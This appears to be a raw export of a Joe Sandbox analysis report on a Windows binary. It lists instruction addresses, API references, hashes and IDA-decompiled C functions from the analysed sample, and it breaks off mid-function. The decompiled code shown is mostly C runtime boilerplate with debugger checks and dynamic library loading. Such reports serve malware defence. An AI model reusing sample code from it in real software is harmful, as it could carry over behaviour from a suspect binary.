                                                                                        0x1000d92f
                                                                                        0x1000d93e
                                                                                        0x1000d943
                                                                                        0x1000d946
                                                                                        0x1000d948
                                                                                        0x1000d964
                                                                                        0x1000d967
                                                                                        0x00000000
                                                                                        0x1000d96d
                                                                                        0x1000d96d
                                                                                        0x1000d974
                                                                                        0x00000000
                                                                                        0x1000d97a
                                                                                        0x1000d980
                                                                                        0x1000d982
                                                                                        0x1000d988
                                                                                        0x1000d988
                                                                                        0x1000d98a
                                                                                        0x1000d98a
                                                                                        0x1000d98c
                                                                                        0x1000d995
                                                                                        0x1000d99c
                                                                                        0x1000d99f
                                                                                        0x1000d9a0
                                                                                        0x1000d9a2
                                                                                        0x1000d9a2
                                                                                        0x00000000
                                                                                        0x1000d98a
                                                                                        0x1000d974
                                                                                        0x1000d94a
                                                                                        0x1000d94c
                                                                                        0x1000d952
                                                                                        0x1000d958
                                                                                        0x1000d959
                                                                                        0x00000000
                                                                                        0x1000d959
                                                                                        0x1000d948
                                                                                        0x1000d896
                                                                                        0x1000d896
                                                                                        0x1000d89c
                                                                                        0x1000d89e
                                                                                        0x1000d8b3
                                                                                        0x1000d8b6
                                                                                        0x00000000
                                                                                        0x1000d8bc
                                                                                        0x1000d8bc
                                                                                        0x1000d8c3
                                                                                        0x00000000
                                                                                        0x1000d8c9
                                                                                        0x1000d8cf
                                                                                        0x1000d8d1
                                                                                        0x1000d8d7
                                                                                        0x1000d8d7
                                                                                        0x1000d8d9
                                                                                        0x1000d8d9
                                                                                        0x1000d8db
                                                                                        0x1000d8e4
                                                                                        0x1000d8eb
                                                                                        0x1000d8ee
                                                                                        0x1000d8ef
                                                                                        0x1000d8f1
                                                                                        0x1000d8f1
                                                                                        0x1000d9aa
                                                                                        0x1000d9aa
                                                                                        0x1000d9ac
                                                                                        0x00000000
                                                                                        0x1000d9b2
                                                                                        0x1000d9b2
                                                                                        0x1000d9b8
                                                                                        0x1000d9bb
                                                                                        0x1000d8fe
                                                                                        0x1000d905
                                                                                        0x00000000
                                                                                        0x1000d9c1
                                                                                        0x1000d9c3
                                                                                        0x1000d9c9
                                                                                        0x1000d9cf
                                                                                        0x1000d9d0
                                                                                        0x1000dbc7
                                                                                        0x1000dbc7
                                                                                        0x1000dbce
                                                                                        0x1000dbcf
                                                                                        0x1000dbd0
                                                                                        0x1000dbd5
                                                                                        0x1000dbd8
                                                                                        0x1000dbd8
                                                                                        0x1000d9bb
                                                                                        0x1000d9ac
                                                                                        0x1000d8c3
                                                                                        0x1000d8a0
                                                                                        0x1000d8a0
                                                                                        0x1000d8a2
                                                                                        0x1000d8a8
                                                                                        0x1000db52
                                                                                        0x1000db52
                                                                                        0x1000db53
                                                                                        0x1000db59
                                                                                        0x1000db59
                                                                                        0x1000db60
                                                                                        0x1000db61
                                                                                        0x1000db62
                                                                                        0x1000db67
                                                                                        0x1000db6a
                                                                                        0x1000db6a
                                                                                        0x1000db6a
                                                                                        0x1000d89e
                                                                                        0x1000db6c
                                                                                        0x1000db6c
                                                                                        0x1000db6e
                                                                                        0x1000dbdc
                                                                                        0x1000dbe3
                                                                                        0x1000dbe3
                                                                                        0x1000dbe3
                                                                                        0x1000dbea
                                                                                        0x1000dbec
                                                                                        0x1000dbf2
                                                                                        0x1000dbf3
                                                                                        0x1000e09f
                                                                                        0x1000e09f
                                                                                        0x1000e0a0
                                                                                        0x1000e0a1
                                                                                        0x1000e0a6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000db70
                                                                                        0x1000db76
                                                                                        0x1000db76
                                                                                        0x1000db7c
                                                                                        0x1000db7c
                                                                                        0x1000db88
                                                                                        0x00000000
                                                                                        0x1000db88
                                                                                        0x1000d817
                                                                                        0x1000e0a9
                                                                                        0x1000e0a9
                                                                                        0x1000e0af
                                                                                        0x1000e0b1
                                                                                        0x1000e0b7
                                                                                        0x1000e0bd
                                                                                        0x1000e0bf
                                                                                        0x1000e0c1
                                                                                        0x1000e0c3
                                                                                        0x1000e0c3
                                                                                        0x1000e0c5
                                                                                        0x1000e0c5
                                                                                        0x1000e0ce
                                                                                        0x1000e0cf
                                                                                        0x1000e0d3
                                                                                        0x1000e0da
                                                                                        0x1000e0dd
                                                                                        0x1000e0de
                                                                                        0x1000e0e0
                                                                                        0x1000e0e0
                                                                                        0x1000e0e4
                                                                                        0x1000e0ea
                                                                                        0x1000e0ec
                                                                                        0x1000e0f2
                                                                                        0x1000e0f4
                                                                                        0x1000e0fa
                                                                                        0x1000e0fd
                                                                                        0x1000e110
                                                                                        0x1000e113
                                                                                        0x1000e119
                                                                                        0x1000e12e
                                                                                        0x1000e133
                                                                                        0x1000e0ff
                                                                                        0x1000e101
                                                                                        0x1000e108
                                                                                        0x1000e108
                                                                                        0x1000e0fd
                                                                                        0x1000e136
                                                                                        0x1000e136
                                                                                        0x1000e146
                                                                                        0x1000e14f
                                                                                        0x1000e150
                                                                                        0x1000e152
                                                                                        0x1000e1e9
                                                                                        0x1000e1eb
                                                                                        0x1000e1f6
                                                                                        0x1000e1f6
                                                                                        0x1000e1f8
                                                                                        0x1000e1fb
                                                                                        0x1000e1fd
                                                                                        0x00000000
                                                                                        0x1000e1ed
                                                                                        0x1000e1f3
                                                                                        0x1000e1f3
                                                                                        0x1000e158
                                                                                        0x1000e158
                                                                                        0x1000e15e
                                                                                        0x1000e161
                                                                                        0x1000e167
                                                                                        0x1000e16a
                                                                                        0x1000e170
                                                                                        0x1000e172
                                                                                        0x1000e178
                                                                                        0x1000e17a
                                                                                        0x1000e17c
                                                                                        0x1000e17c
                                                                                        0x1000e17e
                                                                                        0x1000e17e
                                                                                        0x1000e18b
                                                                                        0x1000e192
                                                                                        0x1000e195
                                                                                        0x1000e196
                                                                                        0x1000e198
                                                                                        0x1000e199
                                                                                        0x1000e199
                                                                                        0x1000e19d
                                                                                        0x1000e1a3
                                                                                        0x1000e1a5
                                                                                        0x1000e1a7
                                                                                        0x1000e1ad
                                                                                        0x1000e1b0
                                                                                        0x1000e1c4
                                                                                        0x1000e1ca
                                                                                        0x1000e1df
                                                                                        0x1000e1e4
                                                                                        0x1000e1b2
                                                                                        0x1000e1b2
                                                                                        0x1000e1b9
                                                                                        0x1000e1b9
                                                                                        0x1000e1b0
                                                                                        0x1000e1a5
                                                                                        0x1000e203
                                                                                        0x1000e203
                                                                                        0x1000e203
                                                                                        0x1000e20f
                                                                                        0x1000e212
                                                                                        0x1000e218
                                                                                        0x1000e21a
                                                                                        0x1000e21c
                                                                                        0x1000e222
                                                                                        0x1000e224
                                                                                        0x1000e224
                                                                                        0x1000e224
                                                                                        0x1000e222
                                                                                        0x1000e229
                                                                                        0x1000e22a
                                                                                        0x1000e22c
                                                                                        0x1000e22e
                                                                                        0x1000e22e
                                                                                        0x1000e230
                                                                                        0x1000e236
                                                                                        0x1000e23c
                                                                                        0x1000e23e
                                                                                        0x1000e244
                                                                                        0x1000e244
                                                                                        0x1000e24a
                                                                                        0x1000e24c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000e252
                                                                                        0x1000e254
                                                                                        0x1000e256
                                                                                        0x1000e256
                                                                                        0x1000e258
                                                                                        0x1000e258
                                                                                        0x1000e268
                                                                                        0x1000e26f
                                                                                        0x1000e272
                                                                                        0x1000e273
                                                                                        0x1000e275
                                                                                        0x1000e275
                                                                                        0x1000e279
                                                                                        0x1000e27f
                                                                                        0x1000e281
                                                                                        0x1000e283
                                                                                        0x1000e289
                                                                                        0x1000e28c
                                                                                        0x1000e29d
                                                                                        0x1000e2a0
                                                                                        0x1000e2a6
                                                                                        0x1000e2bb
                                                                                        0x1000e2c0
                                                                                        0x1000e28e
                                                                                        0x1000e28e
                                                                                        0x1000e295
                                                                                        0x1000e295
                                                                                        0x1000e28c
                                                                                        0x1000e2d1
                                                                                        0x1000e2e0
                                                                                        0x1000e2e1
                                                                                        0x1000e2e1
                                                                                        0x1000e2e3
                                                                                        0x1000e2e5
                                                                                        0x1000e2e5
                                                                                        0x1000e2eb
                                                                                        0x1000e2ee
                                                                                        0x1000e2f0
                                                                                        0x1000e2f2
                                                                                        0x1000e2f2
                                                                                        0x1000e2f5
                                                                                        0x1000e2f6
                                                                                        0x1000e2f6
                                                                                        0x1000e2fb
                                                                                        0x1000e2fe
                                                                                        0x1000e302
                                                                                        0x1000e302
                                                                                        0x1000e303
                                                                                        0x1000e305
                                                                                        0x1000e30b
                                                                                        0x1000e311
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000e311
                                                                                        0x1000e244
                                                                                        0x1000e317
                                                                                        0x1000e317
                                                                                        0x00000000
                                                                                        0x1000e317
                                                                                        0x1000d09c
                                                                                        0x1000d093
                                                                                        0x1000d08a
                                                                                        0x1000d041
                                                                                        0x1000d045
                                                                                        0x1000d04d
                                                                                        0x00000000
                                                                                        0x1000d04f
                                                                                        0x1000d055
                                                                                        0x1000d05a
                                                                                        0x1000e336
                                                                                        0x1000e336
                                                                                        0x1000e339
                                                                                        0x1000e344
                                                                                        0x1000e36f
                                                                                        0x1000e370
                                                                                        0x1000e371
                                                                                        0x1000e372
                                                                                        0x1000e373
                                                                                        0x1000e374
                                                                                        0x1000e379
                                                                                        0x1000e37a
                                                                                        0x1000e381
                                                                                        0x1000e386
                                                                                        0x1000e38c
                                                                                        0x1000e391
                                                                                        0x1000e392
                                                                                        0x1000e392
                                                                                        0x1000e392
                                                                                        0x1000e398
                                                                                        0x1000e399
                                                                                        0x1000e399
                                                                                        0x1000e39c
                                                                                        0x1000e3a2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1000e3a4
                                                                                        0x1000e3a9
                                                                                        0x1000e3ac
                                                                                        0x1000e3ae
                                                                                        0x1000e3b3
                                                                                        0x1000e3b6
                                                                                        0x1000e3b8
                                                                                        0x1000e3ba
                                                                                        0x1000e3bf
                                                                                        0x1000e3c2
                                                                                        0x1000e3c8
                                                                                        0x1000e3cb
                                                                                        0x1000e3cd
                                                                                        0x1000e3cd
                                                                                        0x1000e3cd
                                                                                        0x1000e3cd
                                                                                        0x1000e3cb
                                                                                        0x1000e3d0
                                                                                        0x1000e3dc
                                                                                        0x1000e3e2
                                                                                        0x1000e3ea
                                                                                        0x1000e3ef
                                                                                        0x1000e3f0
                                                                                        0x1000e3f5
                                                                                        0x1000e3f5
                                                                                        0x1000e3f5
                                                                                        0x1000e3f5
                                                                                        0x1000e3f9
                                                                                        0x1000e3f9
                                                                                        0x1000e3fc
                                                                                        0x1000e403
                                                                                        0x1000e410
                                                                                        0x1000e346
                                                                                        0x1000e346
                                                                                        0x1000e346
                                                                                        0x1000e350
                                                                                        0x1000e359
                                                                                        0x1000e35e
                                                                                        0x1000e36c
                                                                                        0x1000e36c
                                                                                        0x1000e344
                                                                                        0x1000d04d

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: __floor_pentium4
                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                        • API String ID: 4168288129-2761157908
                                                                                        • Opcode ID: 3b1559b07e50294ac29c3712411c5865266866bfabadb568720c59c1664c5d93
                                                                                        • Instruction ID: 0e129009ebc9035f163d424c54e8d8bbc0e8826c457752bc236d67e178b179fe
                                                                                        • Opcode Fuzzy Hash: 3b1559b07e50294ac29c3712411c5865266866bfabadb568720c59c1664c5d93
                                                                                        • Instruction Fuzzy Hash: 97C26871E086298BEB64DE28CD407DEB7F5EB84384F1541EAD80DE7248E774AE818F50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 10001BE5
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 10001D96
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 10001DB2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                        • String ID: =$(.>>N
                                                                                        • API String ID: 145871493-2280480628
                                                                                        • Opcode ID: 862a0fcaa3a11f2fcfa048f8316cd17513206db055d86f25b078f8b8c21ee13b
                                                                                        • Instruction ID: c0701617539e1d8932dbb19d54a473c8ed4fd1c04930364e9b33024aa79f96a2
                                                                                        • Opcode Fuzzy Hash: 862a0fcaa3a11f2fcfa048f8316cd17513206db055d86f25b078f8b8c21ee13b
                                                                                        • Instruction Fuzzy Hash: 9D51E52AD257955BF703DB79C8411D9F7A4AF6B281B54C32BF800B2662FB30A7824740
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 76%
                                                                                        			E10006005(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                        				char _v0;
                                                                                        				signed int _v8;
                                                                                        				intOrPtr _v524;
                                                                                        				intOrPtr _v528;
                                                                                        				void* _v532;
                                                                                        				intOrPtr _v536;
                                                                                        				char _v540;
                                                                                        				intOrPtr _v544;
                                                                                        				intOrPtr _v548;
                                                                                        				intOrPtr _v552;
                                                                                        				intOrPtr _v556;
                                                                                        				intOrPtr _v560;
                                                                                        				intOrPtr _v564;
                                                                                        				intOrPtr _v568;
                                                                                        				intOrPtr _v572;
                                                                                        				intOrPtr _v576;
                                                                                        				intOrPtr _v580;
                                                                                        				intOrPtr _v584;
                                                                                        				char _v724;
                                                                                        				intOrPtr _v792;
                                                                                        				intOrPtr _v800;
                                                                                        				char _v804;
                                                                                        				struct _EXCEPTION_POINTERS _v812;
                                                                                        				signed int _t40;
                                                                                        				char* _t47;
                                                                                        				char* _t49;
                                                                                        				intOrPtr _t61;
                                                                                        				intOrPtr _t62;
                                                                                        				intOrPtr _t66;
                                                                                        				intOrPtr _t67;
                                                                                        				int _t68;
                                                                                        				intOrPtr _t69;
                                                                                        				signed int _t70;
                                                                                        
                                                                                        				_t69 = __esi;
                                                                                        				_t67 = __edi;
                                                                                        				_t66 = __edx;
                                                                                        				_t61 = __ebx;
                                                                                        				_t40 =  *0x1001a004; // 0xcfb68a75
                                                                                        				_t41 = _t40 ^ _t70;
                                                                                        				_v8 = _t40 ^ _t70;
                                                                                        				if(_a4 != 0xffffffff) {
                                                                                        					_push(_a4);
                                                                                        					E100033AE(_t41);
                                                                                        					_pop(_t62);
                                                                                        				}
                                                                                        				E10003E50(_t67,  &_v804, 0, 0x50);
                                                                                        				E10003E50(_t67,  &_v724, 0, 0x2cc);
                                                                                        				_v812.ExceptionRecord =  &_v804;
                                                                                        				_t47 =  &_v724;
                                                                                        				_v812.ContextRecord = _t47;
                                                                                        				_v548 = _t47;
                                                                                        				_v552 = _t62;
                                                                                        				_v556 = _t66;
                                                                                        				_v560 = _t61;
                                                                                        				_v564 = _t69;
                                                                                        				_v568 = _t67;
                                                                                        				_v524 = ss;
                                                                                        				_v536 = cs;
                                                                                        				_v572 = ds;
                                                                                        				_v576 = es;
                                                                                        				_v580 = fs;
                                                                                        				_v584 = gs;
                                                                                        				asm("pushfd");
                                                                                        				_pop( *_t22);
                                                                                        				_v540 = _v0;
                                                                                        				_t49 =  &_v0;
                                                                                        				_v528 = _t49;
                                                                                        				_v724 = 0x10001;
                                                                                        				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                                                        				_v804 = _a8;
                                                                                        				_v800 = _a12;
                                                                                        				_v792 = _v0;
                                                                                        				_t68 = IsDebuggerPresent();
                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                        				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                                                                        					_push(_a4);
                                                                                        					E100033AE(_t57);
                                                                                        				}
                                                                                        				return E1000296F(_v8 ^ _t70);
                                                                                        			}




































                                                                                        0x10006005
                                                                                        0x10006005
                                                                                        0x10006005
                                                                                        0x10006005
                                                                                        0x10006010
                                                                                        0x10006015
                                                                                        0x10006017
                                                                                        0x1000601f
                                                                                        0x10006021
                                                                                        0x10006024
                                                                                        0x10006029
                                                                                        0x10006029
                                                                                        0x10006035
                                                                                        0x10006048
                                                                                        0x10006056
                                                                                        0x1000605c
                                                                                        0x10006062
                                                                                        0x10006068
                                                                                        0x1000606e
                                                                                        0x10006074
                                                                                        0x1000607a
                                                                                        0x10006080
                                                                                        0x10006086
                                                                                        0x1000608c
                                                                                        0x10006093
                                                                                        0x1000609a
                                                                                        0x100060a1
                                                                                        0x100060a8
                                                                                        0x100060af
                                                                                        0x100060b6
                                                                                        0x100060b7
                                                                                        0x100060c0
                                                                                        0x100060c6
                                                                                        0x100060c9
                                                                                        0x100060cf
                                                                                        0x100060dc
                                                                                        0x100060e5
                                                                                        0x100060ee
                                                                                        0x100060f7
                                                                                        0x10006105
                                                                                        0x10006107
                                                                                        0x1000611c
                                                                                        0x10006128
                                                                                        0x1000612b
                                                                                        0x10006130
                                                                                        0x1000613f

                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,10002953), ref: 100060FD
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,10002953), ref: 10006107
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,10002953), ref: 10006114
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                        • String ID:
                                                                                        • API String ID: 3906539128-0
                                                                                        • Opcode ID: 303e84f06bf8875183028f7801d6a0d5379eec46540409ad7a310f2cfe3a6d65
                                                                                        • Instruction ID: e47cc89797636fe6be3bcc5d66a121bb70a5c7396d66fbe7c00cfa8bdbc53162
                                                                                        • Opcode Fuzzy Hash: 303e84f06bf8875183028f7801d6a0d5379eec46540409ad7a310f2cfe3a6d65
                                                                                        • Instruction Fuzzy Hash: 8631A074901228ABDB21DF64DD8978DBBB8FF08350F5082EAE40DA7251EB309B818F45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 006A7B97
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 006A7BA1
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 006A7BAE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                        • String ID:
                                                                                        • API String ID: 3906539128-0
                                                                                        • Opcode ID: 27682b492986a1653718c731d5ae9d565d0b213a7907b6ba9c09fd657336afea
                                                                                        • Instruction ID: b97bdc09ff388fca8d8483b163f0969859f078047caa0f8f5fd64f6b057b060e
                                                                                        • Opcode Fuzzy Hash: 27682b492986a1653718c731d5ae9d565d0b213a7907b6ba9c09fd657336afea
                                                                                        • Instruction Fuzzy Hash: 1331C274901219ABCF21EF65DD88BCDBBB9BF08310F5081DAE81CA6250EB709F858F55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E10007DE7(int _a4) {
                                                                                        				void* _t14;
                                                                                        				void* _t16;
                                                                                        
                                                                                        				if(E1000AE5A(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                                                        					TerminateProcess(GetCurrentProcess(), _a4);
                                                                                        				}
                                                                                        				E10007E6C(_t14, _t16, _a4);
                                                                                        				ExitProcess(_a4);
                                                                                        			}





                                                                                        0x10007df3
                                                                                        0x10007e0f
                                                                                        0x10007e0f
                                                                                        0x10007e18
                                                                                        0x10007e21

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,10007DBD,00000000,10019428,0000000C,10007F05,00000000,00000002,00000000), ref: 10007E08
                                                                                        • TerminateProcess.KERNEL32(00000000,?,10007DBD,00000000,10019428,0000000C,10007F05,00000000,00000002,00000000), ref: 10007E0F
                                                                                        • ExitProcess.KERNEL32 ref: 10007E21
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        • Opcode ID: 51920c3164923b1a6cfc3ba54bf989193a9d8c1e4bc139a960427d45017a54f1
                                                                                        • Instruction ID: eab69e9463f35dccdfac8ae0d9df5ae2a9b804d4f5c23237b1655957a9a936af
                                                                                        • Opcode Fuzzy Hash: 51920c3164923b1a6cfc3ba54bf989193a9d8c1e4bc139a960427d45017a54f1
                                                                                        • Instruction Fuzzy Hash: 8AE04631401188AFEF02AF20CD4DA493BA9FB487C5B018454F9099B132CB39EC62CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000003,?,006BD588,00000003,00906868,0000000C,006BD6DF,00000003,00000002,00000000,?,006C096B,00000003), ref: 006BD5D3
                                                                                        • TerminateProcess.KERNEL32(00000000,?,006BD588,00000003,00906868,0000000C,006BD6DF,00000003,00000002,00000000,?,006C096B,00000003), ref: 006BD5DA
                                                                                        • ExitProcess.KERNEL32 ref: 006BD5EC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        • Opcode ID: f53a2751d91bcc3b75159aafd7f9dcf7303f25f40efe191ee3da9b399e809c86
                                                                                        • Instruction ID: 5c0981aec04fec2808299d7bfb7e3bf47a30de2ddcb091eb147b3a9933f2626a
                                                                                        • Opcode Fuzzy Hash: f53a2751d91bcc3b75159aafd7f9dcf7303f25f40efe191ee3da9b399e809c86
                                                                                        • Instruction Fuzzy Hash: E9E0B672410148AFCF216F58DD0DAD93B6EFF40795F048068FA058E221EB35ED82CB98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 72%
                                                                                        			E1000B11C(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                                                        				intOrPtr _v8;
                                                                                        				signed int _v12;
                                                                                        				intOrPtr* _v32;
                                                                                        				CHAR* _v36;
                                                                                        				signed int _v48;
                                                                                        				char _v286;
                                                                                        				signed int _v287;
                                                                                        				struct _WIN32_FIND_DATAA _v332;
                                                                                        				intOrPtr* _v336;
                                                                                        				signed int _v340;
                                                                                        				signed int _v344;
                                                                                        				intOrPtr _v372;
                                                                                        				signed int _t35;
                                                                                        				signed int _t40;
                                                                                        				signed int _t43;
                                                                                        				intOrPtr _t45;
                                                                                        				signed char _t47;
                                                                                        				intOrPtr* _t55;
                                                                                        				union _FINDEX_INFO_LEVELS _t57;
                                                                                        				signed int _t62;
                                                                                        				signed int _t65;
                                                                                        				void* _t72;
                                                                                        				void* _t74;
                                                                                        				signed int _t75;
                                                                                        				void* _t78;
                                                                                        				CHAR* _t79;
                                                                                        				intOrPtr* _t83;
                                                                                        				intOrPtr _t85;
                                                                                        				void* _t87;
                                                                                        				intOrPtr* _t88;
                                                                                        				signed int _t92;
                                                                                        				signed int _t96;
                                                                                        				void* _t101;
                                                                                        				intOrPtr _t102;
                                                                                        				signed int _t105;
                                                                                        				union _FINDEX_INFO_LEVELS _t106;
                                                                                        				void* _t111;
                                                                                        				intOrPtr _t112;
                                                                                        				void* _t113;
                                                                                        				signed int _t118;
                                                                                        				void* _t119;
                                                                                        				signed int _t120;
                                                                                        				void* _t121;
                                                                                        				void* _t122;
                                                                                        
                                                                                        				_push(__ecx);
                                                                                        				_t83 = _a4;
